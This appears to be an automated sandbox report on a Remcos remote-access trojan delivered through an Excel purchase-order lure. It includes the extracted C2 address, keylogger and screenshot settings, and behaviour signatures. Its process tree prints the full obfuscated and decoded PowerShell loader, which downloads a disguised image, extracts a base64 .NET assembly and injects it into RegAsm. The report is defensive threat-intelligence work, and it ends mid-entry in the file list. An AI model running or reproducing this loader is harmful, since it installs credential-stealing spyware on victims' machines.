Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    24-04-2024 04:41

General

  • Target

    New Order - DUBAI BURJ KHALIFA LLC - PRICE ENQUIRY - RFQ 60000764690.xla.xls

  • Size

    54KB

  • MD5

    cd771cc01f05d97b4c739828a97f38bd

  • SHA1

    68674eeb423ca6d1cd13dab084bcd7f7135be2af

  • SHA256

    ac194ad1ef873f480d822e706f9112d392a61e2d5a23462638c4277747303f8b

  • SHA512

    b419158ebcd4b4a1bca937b68eb5ce8d2bc65702a4a0bc025fed58c231eb4ab1f096581e30386fbe76e11257f9fa3f0039addf00b77a0cd82950987cb0a9f8b4

  • SSDEEP

    768:yyBP01L1fyfjkv5s0+D5InszEABWXwMsTECYNsh1tJxiU0wE6:y681sf+5s0+D5IszWXrIEJO7tJf0wE

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

107.172.31.178:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-NVSJ5U

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • NirSoft MailPassView 3 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 3 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 9 IoCs
  • Blocklisted process makes network request 7 IoCs
  • Abuses OpenXML format to download file from external location
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\New Order - DUBAI BURJ KHALIFA LLC - PRICE ENQUIRY - RFQ 60000764690.xla.xls"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2684
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2644
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1248
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2672
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\InternetMonkeyloverkissoff.vbs"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:1800
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreSwBTDgTreEsDgTreSwDgTrevDgTreGsDgTreYgBrDgTreC8DgTreUDgTreBQDgTreE0DgTreQQBYDgTreC8DgTreODgTreDgTre3DgTreC4DgTreNQDgTre1DgTreDIDgTreLgDgTreyDgTreDYDgTreMQDgTreuDgTreDkDgTreMwDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBLDgTreEIDgTreSwBLDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2260
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.KSKK/kbk/PPMAX/87.552.261.931//:ptth' , '1' , 'C:\ProgramData\' , 'KBKK','RegAsm',''))} }"
            4⤵
            • Blocklisted process makes network request
            • Adds Run key to start application
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:524
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\KBKK.vbs"
              5⤵
                PID:2888
              • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
                5⤵
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of WriteProcessMemory
                PID:2592
                • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                  C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\cfjeyirokaqlrssnutvmiqtsjj"
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2356
                • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                  C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ehowybcqyiipbygzlepftdobkyofc"
                  6⤵
                  • Accesses Microsoft Outlook accounts
                  PID:2440
                • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                  C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\pcchztnjuqaceecdvpchwiisseyovsun"
                  6⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2284

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Execution

      Exploitation for Client Execution

      1
      T1203

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      2
      T1112

      Credential Access

      Unsecured Credentials

      1
      T1552

      Credentials In Files

      1
      T1552.001

      Discovery

      System Information Discovery

      2
      T1082

      Query Registry

      1
      T1012

      Collection

      Data from Local System

      1
      T1005

      Email Collection

      1
      T1114

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
        Filesize

        68KB

        MD5

        29f65ba8e88c063813cc50a4ea544e93

        SHA1

        05a7040d5c127e68c25d81cc51271ffb8bef3568

        SHA256

        1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

        SHA512

        e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        1fb1503ead400f7e689a6e3515ca51c5

        SHA1

        6725e48da4bf8704ce4ec5d571d80f0ddfef3b79

        SHA256

        dcfa0ffd50618c8edec98063adc631f08e75d119f8a7e6556582b2af2acdf9ee

        SHA512

        9baec11816de1496828605b23c6c6b13df7b8776ddd265c3be7a1122a28f232558ef1930c8eb3c3258dd1d987442510468128cea78239454a87d36d34c8f45e2

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        304B

        MD5

        3a28a679dc4d553d3c42e0c08fc16f81

        SHA1

        3262df378bc49ff91f8de2d25541b1aa703b39b4

        SHA256

        362ea40e5d01c70b4d52431a1f743d3bf305795d6d8aaa2fdd3260b2c09ff1f0

        SHA512

        1512f95530d2cd605e98b6f5abc5399f26229acf5f40184ac79fcad1fbf6261c96f012843ef750f66ec35eb91eaeb08ab894571ddb67b6c5e601b656e752c539

      • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
        Filesize

        128KB

        MD5

        343deb15ba6e21b2cc80121b955a71b2

        SHA1

        888c67cd8938c81236d6ebbfda3cb2ffd4d3ddd6

        SHA256

        db63af4f3b6147dd1c96ddc51b1f02c232d211a00481f68ee9f77df918166ab1

        SHA512

        2d3e619374f3ff8563e5189867d29c40205ec4c0e10ce550d04f6943af1cecb7a4c173c54b7f995006c631e056f46951509f3909cdcedc41f68603718cc181a9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\moneyjumpinginthetreewithmonkeycallkissherloverwithouthavingkissingbetterthananotherlovreshe___isverybeautifulgirlmonkeykisser[1].doc
        Filesize

        79KB

        MD5

        390887d6627a4de66aac8349c57a495a

        SHA1

        aec3c18736f1ab675276c7b21076b0b48c3251a7

        SHA256

        4aefad6748025172503bac223b804d8de0dc741483409c7f19bc29b1859ba0bb

        SHA512

        b0a8fc3d7d833d972c9b63d79725ec72cbce81ddcbd2d0f4106ca7c626ae6749b989128533f022638e2b7cb71719e5d9ad0038fc93f63e9fb2bab584df903c5a

      • C:\Users\Admin\AppData\Local\Temp\CabC9A5.tmp
        Filesize

        65KB

        MD5

        ac05d27423a85adc1622c714f2cb6184

        SHA1

        b0fe2b1abddb97837ea0195be70ab2ff14d43198

        SHA256

        c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

        SHA512

        6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

      • C:\Users\Admin\AppData\Local\Temp\TarC9C8.tmp
        Filesize

        171KB

        MD5

        9c0c641c06238516f27941aa1166d427

        SHA1

        64cd549fb8cf014fcd9312aa7a5b023847b6c977

        SHA256

        4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

        SHA512

        936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

      • C:\Users\Admin\AppData\Local\Temp\TarCAF6.tmp
        Filesize

        177KB

        MD5

        435a9ac180383f9fa094131b173a2f7b

        SHA1

        76944ea657a9db94f9a4bef38f88c46ed4166983

        SHA256

        67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

        SHA512

        1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

      • C:\Users\Admin\AppData\Local\Temp\cfjeyirokaqlrssnutvmiqtsjj
        Filesize

        2B

        MD5

        f3b25701fe362ec84616a93a45ce9998

        SHA1

        d62636d8caec13f04e28442a0a6fa1afeb024bbb

        SHA256

        b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

        SHA512

        98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

      • C:\Users\Admin\AppData\Local\Temp\{3C8FBAE2-DCF8-4919-8917-37FC12110873}
        Filesize

        128KB

        MD5

        ccf3d1725337c7dd5b04a5806cde29f5

        SHA1

        523693af586adadbb8d9d56c58999de6f258cef7

        SHA256

        6a729e07c2d03866ad5fc79e741ebf0272332e6497e7081389877581a8ea7bbc

        SHA512

        6ee03763f7de52f6519d3e8ee9da773169c7b5a1f5756ccea2e3b7d39dede19b07c2ede00c143506ca80f82e66f19981a07ac14f1f85543785d76c224211002d

      • C:\Users\Admin\AppData\Roaming\InternetMonkeyloverkissoff.vbs
        Filesize

        86KB

        MD5

        f298cc29054bc56d193e76414d436b2c

        SHA1

        f521a11c9e63022ae0a7228117ca6aea51a23f82

        SHA256

        b0e22909bea588ce8ab5dfb7d8a624b2e262dab70d4eaced092060872aa44a6e

        SHA512

        882aa14f083185e624198b4ade4c2a972305e2062928c2363ec14c3aacc6aa0902e98adaf63d8c641d3a015629601a9940b230826328d250ed788d2a744f536c

      • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
        Filesize

        20KB

        MD5

        0e05fb5f4ad0247aa294ca08c3d2ed28

        SHA1

        b3ba4f16171d0365308fc601694fe9ece74be72e

        SHA256

        f3534deb0d8e820c6bfb9746502863cd437cfc27bb251a033743b642dfffb8bc

        SHA512

        128e1b27360cc5eb78bd4f38cb842350a674c733b68c6e780533267f9f4084b5aaa4a1b789ad6e8f0cc32117c605a9886ee60e590c4661bc3562d66edc0c796d

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        Filesize

        7KB

        MD5

